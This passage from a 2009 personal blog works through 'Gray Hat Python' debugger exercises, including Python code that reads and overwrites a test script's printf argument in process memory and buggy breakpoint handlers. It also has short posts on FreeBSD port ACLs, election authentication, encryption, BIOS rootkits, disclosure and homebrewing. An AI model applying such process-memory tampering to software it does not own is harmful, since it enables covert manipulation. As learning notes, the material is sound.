    print "Counter: %d" % int(counter)

To this:


def printf_randomizer(dbg):
    
    # Read in the value of the counter at ESP + 0x4 as a DWORD
    parameter_addr = dbg.context.Esp + 0x4
    #print dbg.dump_context()
    counter = dbg.read_process_memory(parameter_addr,4)
    
    # When using read_process_memory, it returns a packed binary
    # string, we must first unpack it before we can use it further
    
    # Hack time. Our real parameter address is different, since it's
    # referenced. This is the base. We'll need to go into it to find the
    # offset
    parameter_addr_base = struct.unpack("L",counter)[0]
    
    # If using this string, "Loop iteration ", the length to number = 15
    # Add in the number itself (assume counter doesn't go beyond XXXX
    # And then "!\n", two more bytes
    string_len = 15 + 4 + 2
    counter_string = dbg.read_process_memory(parameter_addr_base, int(string_len))
    counter_string = struct.unpack(str(string_len) + "s",counter_string)[0]

    # cleanup string
    counter_string = counter_string.split("!\n")[0]
    # And grab number
    counter = counter_string[15:]
    print "Counter: %d" % int(counter)

Now, here's the thing. We can read the variable, whoopy. But, we're going to have to modify the heap to possibly insert a variable between one to three bytes into an existing heap that might not have room. So, to play nice, I'm only adding back into the heap the amount possible. (We don't want to add a vulnerability to our testing ;-)

Also, from testing, the data does not need to be packed, since it's a string. So, the random_number is going back into the heap as a string and not an int.

Prior code:


    # Generate a random number and pack it into binary format
    # so that it is written correctly back into the process
    random_counter = random.randint(1,100)
    random_counter = struct.pack("L",random_counter)[0]
    
    # Now swap in our random number and resume the process
    dbg.write_process_memory(parameter_addr, random_counter)

New code:


    # Generate a random number and pack it into binary format
    # so that it is written correctly back into the process
    random_counter = int(random.randint(1,100))
    
    # Pack in only what will fit, though.
    if (len(counter) > 1): 
        random_counter = str(random_counter)[0:len(counter)-1]
    else:
        random_counter = str(random_counter)[0]
    #random_counter = struct.pack("L",random_counter)[0]
        
    # Change our parameter address to point to the right
    # location, 15 characters in
    parameter_addr = parameter_addr_base + 15
        
    # Now swap in our random number and resume the process
    dbg.write_process_memory(parameter_addr,random_counter)

And, it gives this output:


Enter the printf_loop.py PID: 408
Counter: 2
Counter: 3
Counter: 4
Counter: 5
Counter: 6
Counter: 7
Counter: 8
Counter: 9
Counter: 10
Counter: 11
Counter: 12
Counter: 13
Counter: 14
[...]

C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src>python pri
ntf_loop.py
Loop iteration 0!
Loop iteration 1!
Loop iteration 5!
Loop iteration 6!
Loop iteration 7!
Loop iteration 5!
Loop iteration 4!
Loop iteration 6!
Loop iteration 8!
Loop iteration 2!
Loop iteration 10!
Loop iteration 81!
Loop iteration 52!
Loop iteration 53!
Loop iteration 74!
[...]

Fun!

Gray Hat Python Chapter 3.4.2 Love, Part 1 (and some 3.4.1 pillow talk)

2009-08-06T10:37:00.006-06:00

So, yeah, 3.4.2 didn't go well either. Going back to my write-up on Chapter 3.4.1, I realize I missed an error and as well propagated it:

It looks like self.context.Eip is causing some grief. Looking ahead, it looks like it's covered on page 48. Comment out the following:
           self.context = self.get_thread_context(h_thread=self.h_thread)
           self.context.Eip -= 1
          
           kernel32.SetThreadContext(self.h_thread,byref(self.context))

self.context.Eip should have been able to be set to the CONTEXT() structure from my_debugger_defines. Since it's not being set, then something is amiss.

Here's the code for get_thread_context from the book:


    def get_thread_context(self, thread_id=None, h_thread=None):
        
        context = CONTEXT()
        context.ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS
        
        # Obtain a handle to the thread
        h_thread = self.open_thread(thread_id)
        if kernel32.GetThreadContext(h_thread, byref(context)):
            kernel32.CloseHandle(h_thread)
            return context
        else:
            return False

Here's the code for get_thread_context from the src files:


    def get_thread_context (self, thread_id=None,h_thread=None):
        
        context = CONTEXT()
        context.ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS
        
        # Obtain a handle to the thread
        if h_thread is None:
            self.h_thread = self.open_thread(thread_id)
                        
        if kernel32.GetThreadContext(self.h_thread, byref(context)):
            
            return context 
        else:
            return False

So, the book example blindly sets the local h_thread versus the revised code. Funny enough, the revised code I am assuming is assuming that the passed h_thread is also self.h_thread, since no latter assignment is made. The other difference is kernel32.CloseHandle() is called in the book example whilst not in the src code example.

There are two times that h_thread is already set for us: one in get_debug_event() and the other in exception_handler_breakpoint(). There are two times it is not set: bp_set_hw() and bp_del_hw(). So, we want to still test to see if h_thread is None and if so, set. If it isn't, well, then use it :-)


    def get_thread_context (self, thread_id=None,h_thread=None):
        
        context = CONTEXT()
        context.ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS
        
        # Obtain a handle to the thread
        if h_thread is None:
            h_thread = self.open_thread(thread_id)
            self.h_thread = h_thread

        if kernel32.GetThreadContext(h_thread, byref(context)):
            
            return context 
        else:
            return False

And, I'll remove the CloseHandle call for now. Looking at the functions where the handle is passed to us, exception_handler_breakpoint() would be very unhappy with us if we closed the handle prematurely. And, we'll set self.h_thread, so it's in the instance itself.

And, here's the run:


Enter the PID of the process to attach to: 3000
[*] Address of printf: 0x77c4186a
Event Code: 3 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 6 Thread ID: 3008
Event Code: 2 Thread ID: 1444
Event Code: 1 Thread ID: 1444
[*] Exception address: 0x7c90120e
[*] Hit the first breakpoint.
Event Code: 4 Thread ID: 1444
Event Code: 1 Thread ID: 3008
Traceback (most recent call last):
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_test.py", line 21, in 
    debugger.run()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 90, in run
    self.get_debug_event()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 125, in get_debug_event
    self.exception_handler_single_step()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 343, in exception_handler_single_step
    continue_status = DBG_EXCEPTION_NOT_HANDLED
NameError: global name 'DBG_EXCEPTION_NOT_HANDLED' is not defined

DBG_EXCEPTION_NOT_HANDLED is not defined in my_debugger_defines. Put this below DBG_CONTINUE:


DBG_EXCEPTION_NOT_HANDLED          = 0x80010001

Oh, also since you see my path, I'm running this in a VM, hence Administrator running all of this. Why not?! :-)

Next run:


Enter the PID of the process to attach to: 3068
[*] Address of printf: 0x77c4186a
Event Code: 3 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 6 Thread ID: 3076
Event Code: 2 Thread ID: 3140
Event Code: 1 Thread ID: 3140
[*] Exception address: 0x7c90120e
[*] Hit the first breakpoint.
Event Code: 4 Thread ID: 3140
Event Code: 1 Thread ID: 3076
Traceback (most recent call last):
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_test.py", line 21, in 
    debugger.run()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 90, in run
    self.get_debug_event()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 125, in get_debug_event
    self.exception_handler_single_step()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 346, in exception_handler_single_step
    if self.bp_del_hw(slot):
UnboundLocalError: local variable 'slot' referenced before assignment

Here's the code snippet:


        if self.context.Dr6 & 0x1 and self.hardware_breakpoints.has_key(0):
            slot = 0
        elif self.context.Dr6 & 0x2 and self.hardware_breakpoints.has_key(1):
            slot = 1
        elif self.context.Dr6 & 0x4 and self.hardware_breakpoints.has_key(2):
            slot = 2
        elif self.context.Dr6 & 0x8 and self.hardware_breakpoints.has_key(3):
            slot = 3
        else:
            # This wasn't an INT1 generated by a hw breakpoint
            continue_status = DBG_EXCEPTION_NOT_HANDLED
        
        # now let's remove the breakpoint from the list
        if self.bp_del_hw(slot):
            continue_status = DBG_CONTINUE

I'm troubleshooting this. Throwing a print in there shows Dr6 as 4294905840 / 0xFFFF0FF0, which is the power-up state [1]. So, we're at 0, which seems to me that the register is not being set. Also, this shows a coding error. The conditional does not set slot and assumes 'slot' it's set. I'll ignore that issue. But, now, I gotta take off...

[1] Intel® 64 and IA-32 Architectures Software Developer's Manual Volume 3A: System Programming Guide, Table 9-1

Gray Hat Python Chapter 3.4.1 Love

2009-07-30T11:43:00.006-06:00

Here are some fixes for Chapter 3.4 in Gray Hat Python. I have applied the updates / errata to the book to my_debugger.py but some minor info is not present.

Here's the code so far for exception_handler_breakpoint():


    def exception_handler_breakpoint(self):
        
        print "[*] Inside the breakpoint handler."
        print "Exception Address: 0x%08x" % self.exception_address
        return DBG_CONTINUE

The source has this for the function, though:


   def exception_handler_breakpoint(self):
       print "[*] Exception address: 0x%08x" % self.exception_address
       # check if the breakpoint is one that we set
       if not self.breakpoints.has_key(self.exception_address):
         
               # if it is the first Windows driven breakpoint
               # then let's just continue on
               if self.first_breakpoint == True:
                  self.first_breakpoint = False
                  print "[*] Hit the first breakpoint."
                  return DBG_CONTINUE
             
       else:
           print "[*] Hit user defined breakpoint."
           # this is where we handle the breakpoints we set
           # first put the original byte back
           self.write_process_memory(self.exception_address, self.breakpoints[self.exception_address])

           # obtain a fresh context record, reset EIP back to the
           # original byte and then set the thread's context record
           # with the new EIP value
           self.context = self.get_thread_context(h_thread=self.h_thread)
           # self.context.Eip -= 1
          
           kernel32.SetThreadContext(self.h_thread,byref(self.context))
          
           continue_status = DBG_CONTINUE


       return continue_status

No other changes are made to exception_handler_breakpoint() anywhere else in Chapter 3, outside of page 42. So, my guess is that the function updates / changes were not fully printed.

Well, not so quite. Adding just all of that text causes an error in self.first_breakpoint. That property is defined on pg. 48. Also define first_breakpoint in __init__ for debugger():


class debugger():
    def __init__(self):
        self.h_process      = None
        self.pid            = None
        self.debugger_active    = False
        self.h_thread       = None
        self.context        = None
        self.exception      = None
        self.exception_address  = None
        self.breakpoints    = {}
        self.first_breakpoint = True

Almost out of the woods...


Enter the PID of the process to attach to: 2216
[*] Address of printf: 0x77c4186a
Event Code: 3 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 6 Thread ID: 3340
Event Code: 2 Thread ID: 3372
Event Code: 1 Thread ID: 3372
[*] Exception address: 0x7c90120e
[*] Hit the first breakpoint.
Event Code: 4 Thread ID: 3372
Event Code: 1 Thread ID: 3340
[*] Exception address: 0x77c4186a
[*] Hit user defined breakpoint.
Traceback (most recent call last):
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_test.py", line 20, in 
    debugger.run()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 89, in run
    self.get_debug_event()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 118, in get_debug_event
    continue_status = self.exception_handler_breakpoint()
  File "C:\Documents and Settings\Administrator\workspace\Grey Hat Python\src\my_debugger.py", line 205, in exception_handler_breakpoint
    self.context.Eip -= 1
AttributeError: 'bool' object has no attribute 'Eip'

It looks like self.context.Eip is causing some grief. Looking ahead, it looks like it's covered on page 48. Comment out the following:


           self.context = self.get_thread_context(h_thread=self.h_thread)
           self.context.Eip -= 1
          
           kernel32.SetThreadContext(self.h_thread,byref(self.context))

So now the handler looks like this:


    def exception_handler_breakpoint(self):
       print "[*] Exception address: 0x%08x" % self.exception_address
              # check if the breakpoint is one that we set
       if not self.breakpoints.has_key(self.exception_address):
         
               # if it is the first Windows driven breakpoint
               # then let's just continue on
               if self.first_breakpoint == True:
                  self.first_breakpoint = False
                  print "[*] Hit the first breakpoint."
                  return DBG_CONTINUE
             
       else:
           print "[*] Hit user defined breakpoint."
           # this is where we handle the breakpoints we set
           # first put the original byte back
           self.write_process_memory(self.exception_address, self.breakpoints[self.exception_address])

           # obtain a fresh context record, reset EIP back to the
           # original byte and then set the thread's context record
           # with the new EIP value
           #self.context = self.get_thread_context(h_thread=self.h_thread)
           #self.context.Eip -= 1
          
           #kernel32.SetThreadContext(self.h_thread,byref(self.context))
          
           continue_status = DBG_CONTINUE
        
       return continue_status

Seems decent:


Enter the PID of the process to attach to: 3744
[*] Address of printf: 0x77c4186a
Event Code: 3 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 6 Thread ID: 3712
Event Code: 2 Thread ID: 3660
Event Code: 1 Thread ID: 3660
[*] Exception address: 0x7c90120e
[*] Hit the first breakpoint.
Event Code: 4 Thread ID: 3660
Event Code: 1 Thread ID: 3712
[*] Exception address: 0x77c4186a
[*] Hit user defined breakpoint.
Event Code: 1 Thread ID: 3712
Event Code: 1 Thread ID: 3712
Event Code: 1 Thread ID: 3712
[...]

For the anally-included, change bp_set() in my_debugger.py from


    def bp_set(self,address):
        if not self.breakpoints.has_key(address):


    def bp_set(self,address):
        print "[*] Setting breakpoint at: 0x%08x" % address
        if not self.breakpoints.has_key(address):

Elections: Authentication and Authorization

2009-06-15T14:29:00.003-06:00

I jumped into a tweet discussion by @s7ephen on using a PKI-esque way of strengthening the election process.

@s7ephen mentions this in the "thread":

@cykyc hrm yea, I guess I am more thinking it solves a small part of "authentication" but mostly overtrust of polling locations and machines

I have been an elections judge (currently a Chair Judge) for the City of Minneapolis since 2004. Minneapolis breaks down polling areas into wards (high level) and precincts (low levels). The magic happens at the precinct.

The first task is to authorize the voter. That is, is the voter in the right precinct to vote? It is against the law in MN to vote in the wrong precinct, so this is a good thing :-) The authorization process usually starts out by seeing if the voter knows if she is in the right location. If the voter thinks so, a roster book is consulted. The election judge then asks the voter her name and address. If there is a match, that voter is authorized to vote in that precinct. If not, see Same Day Registration process (not documented here :-)

The voter then signs the roster, which attests an oath, that the voter is not up to any shenanigans and such.

Note: the voter did not authenticate herself at any time.

Deterrents, trust, and possible knowledge by election judges are the mitigating controls in lieu of authentication for MN.

So, sadly, we don't authenticate in the first place, unless the name is not on the roster. For my precinct, that means that 90% of the individuals would not be served by having a strong auth solution in place, such as PKI.

Changing Infosec Problems

2009-06-15T13:49:00.003-06:00

I saw falconsview 's blog update today on changing the problem. It's a good read. I would have posted my comments to it in his blog, but it required authentication and it's easier for me to post my reply here than manage another credential elsewhere :-)

I concur with his thoughts on transforming cloud security into a different problem, such as encryption:

Here's what I don't understand: why are we not talking at length about data encryption? Do you want to eliminate or transform a key set of concerns about putting data out in "the cloud" (whatever the heck that is)? Encrypt the data. Encrypt it as close to the source as possible, and only decrypt it temporarily at the point closest to the instance that requires the clear data for use. Never have cleartext data in storage, ever, ever, ever.

While encryption has its own issues, it moves the problem from a discretionary access control issue (i.e. the code controls who accesses what) to a more mandatory access control issue (i.e. only those with secret knowledge can access the data). This isn't foolproof by any means, since securing private secrets by humans sucks. At Hursk, we thought about this during the design of a password cracking service. PGP encrypt the output of the file using an escrow key and also the user's key. Even if the user had an XSS problem in their browser, the attacker would still have to get the passphrase for either the escrow key, the passphrase for the user's private key, or system access to the service running john or whatever on the cleartext password file.

But, utilizing encryption this way still has basically a PKI-esque problem to deal with. So, yeah, the problem is transformed, but in no means have it been solved.

Maybe all of these problems are NP-hard. We're finding out that yeah, we can transform them to a different problem, but in the end, all the problems we transform them into really are difficult to solve :-)

But, please, don't do encryption in the browser.

MAC_PORTACL and no love

2009-05-28T08:19:00.013-06:00

OK, starting to get a bit frustrated. Running 7.2 on a Xen system at RootBSD. I am trying to test MAC portacl with some user-ran jail scenarios. To get it running, since 7.2 does not come with options MAC enabled by default was to rebuild the kernel. I did the following:


# MAC kernel config
grep -v '^#' /usr/src/sys/i386/conf/MAC

include  GENERIC
ident   MACWO

options  MAC

# compile & install
cd /usr/src
make buildkernel KERNCONF=MAC
make installkernel KERNCONF=MAC KODIR=/boot/mac

# loader changes
cat /boot/loader.conf
kern.hz="100"
mac_portacl_load="YES"

# and reboot
nextboot -k mac
reboot

Everything compiled successfully and the reboot occurred. Here's the next steps:


[2136] ~> uname -i
MACWO
[2136] ~> kldstat
Id Refs Address    Size     Name
 1    5 0xc0400000 a11198   kernel
 2    1 0xc0e12000 3ad8     mac_portacl.ko
 3    1 0xc27fe000 4000     nullfs.ko
 4    1 0xc2834000 4000     fdescfs.ko
[2136] ~> sysctl -a security.mac
security.mac.max_slots: 4
security.mac.version: 3
security.mac.mmap_revocation_via_cow: 0
security.mac.mmap_revocation: 1
security.mac.portacl.rules: 
security.mac.portacl.port_high: 1023
security.mac.portacl.autoport_exempt: 1
security.mac.portacl.suser_exempt: 1
security.mac.portacl.enabled: 1

So, it seems the correct kernel is in use, the portacl module is loaded, and some default sysctl are enabled. Now, let's get a new rule setup to allow my account to run something on 80/TCP:


[2136] ~> id
uid=1001(foo) gid=0(wheel) groups=0(wheel)
[2136] ~> sudo sysctl security.mac.portacl.rules=uid:1001:tcp:80
Password:
security.mac.portacl.rules:  -> uid:1001:tcp:80

I ran netstat to see if anything else was bound to 80/TCP, but nothing showed up. And, now for the test!


[2136] ~> nc -l 80
nc: Permission denied

:-(

While I don't document it here, I tried also running sshd on port 80 with debugging. It spit out a permission denied, too. For kicks, I tried to compile in the module.


[2136] ~> grep -v '^#' /usr/src/sys/i386/conf/MAC

include  GENERIC
ident   MACWI

options  MAC

options  MAC_PORTACL  # Network port access control policy

# compile & install (same)

# loader changes
cat /boot/loader.conf
kern.hz="100"

# and reboot
nextboot -k mac
reboot

Let's verify again:


[2136] ~> uname -i
MACWI
[2136] ~> kldstat
Id Refs Address    Size     Name
 1    3 0xc0400000 a12e94   kernel
 2    1 0xc2825000 4000     nullfs.ko
 3    1 0xc285a000 4000     fdescfs.ko
[2136] ~> sysctl -a security.mac
security.mac.max_slots: 4
security.mac.version: 3
security.mac.mmap_revocation_via_cow: 0
security.mac.mmap_revocation: 1
security.mac.portacl.rules: 
security.mac.portacl.port_high: 1023
security.mac.portacl.autoport_exempt: 1
security.mac.portacl.suser_exempt: 1
security.mac.portacl.enabled: 1

This looks promising. Let's create the rule:


[2136] ~> id
uid=1001(foo) gid=0(wheel) groups=0(wheel)
[2136] ~> sudo sysctl security.mac.portacl.rules=uid:1001:tcp:80
Password:
security.mac.portacl.rules:  -> uid:1001:tcp:80

And, now for the test...


[2136] ~> nc -l 80
nc: Permission denied

Same error again. What gives?

UPDATE:
@sourcehosting suggested the following:
truss -fa -o /tmp/nc.log /usr/bin/nc -l 80

Which revealed this:
1564: socket(PF_INET,SOCK_STREAM,6) = 4 (0x4)
1564: setsockopt(0x4,0xffff,0x200,0xbfbfc9f4,0x4,0x6c) = 0 (0x0)
1564: bind(4,{ AF_INET 0.0.0.0:80 },16) ERR#13 'Permission denied'
1564: close(4) = 0 (0x0)
1564: write(2,"nc: ",4) = 4 (0x4)
1564: write(2,"Permission denied\n",18) = 18 (0x12)

So, I dunno if the 0.0.0.0 address is a problem or not...

UPDATE 2 (WITH FIX!):
@sourcehosting came in with the win!

The man page and handbook both mentioned disabling the high and low reserved port ranges.

portacl(4):

In order to enable the mac_portacl policy, MAC policy must be enforced on
sockets (see mac(4)), and the port(s) protected by mac_portacl must not
be included in the range specified by the
net.inet.ip.portrange.reservedlow and net.inet.ip.portrange.reservedhigh
sysctl(8) MIBs.

MAC portacl Handbook:

By default, on UNIX®-like systems, ports fewer than 1024 can only be used by/bound to privileged processes, i.e. those run as root. For mac_portacl(4) to allow non-privileged processes to bind to ports below 1024 this standard UNIX restriction has to be disabled. This can be accomplished by setting the sysctl(8) variables net.inet.ip.portrange.reservedlow and net.inet.ip.portrange.reservedhigh to zero.

Here's what I had:


[2136] ~> sysctl -a net.inet.ip.portrange | grep resernet.inet.ip.portrange.reservedlow: 0
net.inet.ip.portrange.reservedhigh: 1023

And, here's the fix:


[2136] ~> sudo sysctl net.inet.ip.portrange.reservedlow=0 net.inet.ip.portrange.reservedhigh=0
Password:
net.inet.ip.portrange.reservedlow: 0 -> 0
net.inet.ip.portrange.reservedhigh: 1023 -> 0

And, test:


# other terminal connecting to IP on 80, typing 'hello'
[2136] ~> nc -l 80
hello

WHOOP!

BIOS Attacks and Quasi-FUD

2009-03-25T12:14:00.006-06:00

Per @mhandelman's request I am responding to a recent write-up of Core Security's BIOS rootkit attack presented at CanSecWest.

Some topical, albeit not significant issues I had with their write-up was the misspelling of CanSecWest as ConSecWest. Minor issue, but it reminds me of the Obama / Osama screw-ups that say more than they mean to. Also, Ars doesn't even link to the PDF at Core's site; that could have been just bad timing, but at least let Core see who is interested in the PDF...

Anywho, on to substantive ranting...

From the article, last paragraph:

This is not the sort of exploit that anyone bothers with on a grand scale. Not only is it highly impractical, it's also pointless—why go to so much trouble to infect a PC running at a Ma and Pa store if you can spend a hundredth of a cent and send them an infected e-mail they'll open and run?

"This is not the sort of exploit that anyone bothers with on a grand scale":
Orly? While I'm against FUDcasting, it's also disturbing to see a widely-read technical column wholeheartedly discount a new, and in my opinion, attractive attack vector. Do they know that people are now not viewing this as a new attack vector? Have they sent out surveys to malware authors asking them from 1 to 5, if they would consider this vector? I don't know the answer, so I am not going to discount right out of the gate an attack vector. Time will tell. But my guess is that Ars did not do any homework to back up their claim.

"Not only is it highly impractical [...]":

Hmm, also from the article:

"I haven't seen the full text of their presentation [...]".

K., if you're going to say something is impractical but you haven't seen the presentation, then, really? You're gonna say it's impractical? I haven't read the notes either, nor was I at the presentation. I did read this in the PDF from Core:

Real hardware demo
We infected an Phoenix-Award BIOS
Extensively used BIOS
Using the VGA ROM signature as ready-signal.
No debug allowed here, all was done by Reverse-Engineering and
later, Int 10h (Not even printf!)
Injector tool is a 100-line python script!

So, they're able to inject into an extensively used BIOS with an 100-line python script. And, that's impractical? I would at least ask for clarification from Core before stating without any other reason something is impractical. To me, just from the same source, I see that being very practical. Getting root / Administrator on a machine is not impractical, especially if the target is a single-user computer where the user has granted him/herself Administrative rights.

"[...] it's also pointless—why go to so much trouble [...]":
Orly? If I was a malware writer, I would really like the idea that, regardless of someone reinstalling Windows on their PC, I would be able to reclaim control. So, instead of the lather-rinse-repeat cycle of current vulnerabilities, exploits, and targets, I now have command and control of a device ad infinitum, or at least until the BIOS is re-flashed.

While I generally, and subjectively, agree that complex attacks to me do not seem attractive, I also do not discount them. Let the numbers speak. Wander over to Dan Kaminsky's blog at Doxpara and read up on infrastructure attacks, discussed by ZDNet. Whilst not getting bogged down on defining a complex attack, the psyb0t worm seems pretty complex to me. I am not siding one way or another that injecting nastiness at the BIOS level is going to happen or not. And, in that breadth, again, I am not discounting it.

The author seems to discount, without objective reasons, an attack vector that has the potential to be nasty in the future. I just don't know why. It's not FUD. Hmm, I'll call if FID: forget, ignore, discount. So, to me, Ars is promoting FID. That's my beef.

Jon

Too Much Information

2009-03-02T08:54:00.006-06:00

I have Pete Lindstrom's blog, Spire Security, in my RSS feed. I first met Pete at Metricon 2.0, with Gunnar Petereson's introduction. My first impressions were he liked to talk and he wouldn't let other people get a word in edgewise (unless you were rude by Midwestern standards). But, reading Pete's blog and writings have been rewarding because Pete has good, logical points.

I recently commented on The Disclosure Race Condition posting Pete wrote. I was unclear on some of his argument points and assumed he was taking a stance he wasn't:

It is clear from this case that many large security companies already had the information (they already had samples), so the added benefit to the "good guy" community must be adjusted with that information in mind.

I assumed that Pete was stating the vendor provided samples to the many large security companies. This was a red herring that I continued into my second comment. If I can finally paraphrase Pete's argument, it's that the detailed information released by Sourcefire et al. mostly aids evil doers and does little to aid the good guys.

After reading the post a couple more times (yeah, I'm that daft sometimes), I tend to agree with him. The information released is very technical in nature and in my opinion can only help the good guy community if it highlights hitherto unknown bad programming design patterns. Those that need to know, i.e., IDS vendors or the vendor in question, can get the information they need through their own efforts. I also do not think it puts the vendor under more leverage to release the patch sooner, either, because of a lack of empirical data and also intuition (this was not brought up by Pete). I can definitely see information sharing that Shadowserver.org provides a benefit, though. They acted as an information broken which allowed Sourcefire to protect their customers in a timely manner. So, to abuse Kevin Soo Hoo's Stanford masterpiece, how much is enough (or too much?)

To go into more detail, I accept the idea that the existence of N sources of some vulnerability information increases the possibility of M sources, where M < N. This would, in Pete's argument, affect the cost-benefit analysis of the attacker to obtain information on how to exploit some vulnerability. Lowering the attacker's cost compared against whatever return or penalties would only aid in enticing the attacker to perform the attacker. I get that. And Pete did qualify the magnitude of the effect of reducing N sources as possibly being slight in his comments. But, this would be scoped for only the vulnerability/ies in question. That is, it would only reduce the risk to whatever assets for those specific vulnerabilities whose detailed information was not released.

Of course, if this was done broadly, then in general vulnerability information would be more constricted and probably raise the cost-benefit equation of the adversary. I dunno though if this overall would actually reduce the risk. It's hard to say. We're smarter than we were in the early 90's, but that doesn't mean we're better. Would we have 16 year olds writing worms that impact Fortune 500 networks? Probably not. But, again, that's not the only threat we face or risks that are present. It also still emotionally feels dirty that the censoring of information somehow reduces risk... Dunno why, but it does.

Talk amongst yourselves...

The Joys of Homebrewing: How I Hated My Last Batch

2009-01-12T11:18:00.003-06:00

Wow, what a brew...

I count the number of "lessons learned" as a positive indicator of how... frustrating, confusing, disliking, and most importantly, fulfilling, a brew day went. My recipe was basic:

12 lbs of Belgian pale malts
3 oz of Vanguard hops
1 vial of Whitelab 550 Belgian yeast, to be started to compensate

I was going to take the first runnings (1/3) and do a strong beer with that. Then, I was going to take the latter runnings and do a near beer with that.

Now, onwards to the comedy of errors.

Brew Day +1

Brew day was s'pose to be this prior Saturday (Jan. 10). But, I forgot to start my yeast. I had Whitelabs yeast, but I wanted to make sure I could deal with the expected higher alcohol I was aiming for, so I wanted it started. So, I made some DME mixture and started the yeast on Saturday.

By taking up the kitchen on Sunday, my hubby couldn't get groceries and cook. We basically never have groceries in the house on Sunday. The only food I had that day was a burger while going to the homebrew store and lots of bread.

Lesson #1: Brew on Saturday (or your brew day), regardless of your damn yeast situation. Read more for more.

Turkey is for a Turkey Kettle

This Thanksgiving, we used the brew kettle for our deep-fried turkey. The turkey was awesome! The oil though decided not to leave the party. I boiled up some water and was going to pre-heat my mash-tun. I damn well could have combed my hair in the reflection from the oil in the water. I previously scrubbed the shit of out that kettle. Well, I now had a turkey kettle...

Lession #2: Turkeys are for turkey kettles; wort is for a wort kettle. Don't mix that up. Especially in a nice stainless steal kettle.

Spend Money You Don't Have

So, it's Sunday and I have my yeast loving life but down a kettle. I hop over to Midwest Supplies website to review their kettle selection and then to Northern Brewer. Northern Brewer had some sweet kettles with spigots and therometers. My current mash-tun is a Coleman cooler, but I've eyed getting a direct heat mash-tun for some time. Now, I could just get a pump, rig up hosing between the mash-tun and a kettle, and be done with it. But, c'mon, a direct heat mash-tun!

So, I pick up two kettles, a 10-gallon w/ a spigot, thermo, and false bottom and an 8-gallon w/ just a spigot from Northern. My grain bill was 12 lbs in all. I was super excited (except for the cost, which went on the credit card with the huge balance). The drive was 20 miles round trip, no biggie. I got home and realized something very quickly: a 10-gallon kettle with a very wide base and a high (~ 2 inch) false bottom, needs a lot of water to wet the grain. I used a 1 quart of water to 1 pound of grain ratio. With this ratio, the water would have nicely touched the grain with about 3/4 not even phased. I would have had to do a 2 quart to pound ratio to get it wet and a bit more to get it outside of the consistency of dough.

Hmm...

Lesson #3: Before you buy a new piece of equipment, ask people who have used it on its caveats

Spend More Money You Don't Have

So, I could return the 10 g. kettle for an 8 g. But, even with this, I would have to up my grain bill. Either way, back to Northern. I go back and have a conversation with three of the (very knowledgable) guys there. Here's what I learned:

I would have to probably do a 1.5 quart to pound ratio for my mash
I would do better with an 8 gallon kettle
I could use the false bottom or a more tube-like filter. He recommended the false bottom
